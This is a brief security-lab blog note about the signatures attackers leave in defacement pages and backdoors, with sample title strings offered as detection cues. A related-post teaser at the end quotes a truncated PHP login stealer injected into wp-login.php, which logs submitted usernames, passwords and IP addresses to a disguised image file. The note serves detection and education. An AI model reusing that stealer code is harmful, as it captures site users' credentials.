Titles, Imprints and Marks Left by Attackers

  • April 18, 2017
Labs Note

Some attackers seem to like signing their scripts. This fact is especially true for defacements and backdoors, where attackers show their pride stating that they “owned” a site by signing their own malware. Sometimes they write their expressions and nicknames on the title or in the middle of the file:

<title>Ow3nd </title><center><div id=q>Your Site Has Been Ow3nd By ...

Or like in this malware sample:

<title>#Pwned</title><p> ... </p><h3> ... ownz you</h3> ...

Or even the classic one:

<title>Hacked by …

We have seen thousands of defacement title variations (and even more backdoor patterns), and still we find new variations every day.

By looking at a file’s title, we may be able to tell if a file is malware. Though, most of the times, finding malware requires much deeper scanning, decryption and deobfuscation processes, making the task to be difficult and time consuming. If you don’t use such a scanning and want to make sure you didn’t miss any defacements or backdoors on your server, you can have us scan your site for thousands of different malware patterns.

Jose is a Security Researcher at Sucuri. He enjoys coding tools that group malware with similar characteristics for improving detection. He spends his free time with his family.

Related Tags
Related Categories
You May Also Like
Labs Note

Simple WP login stealer

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post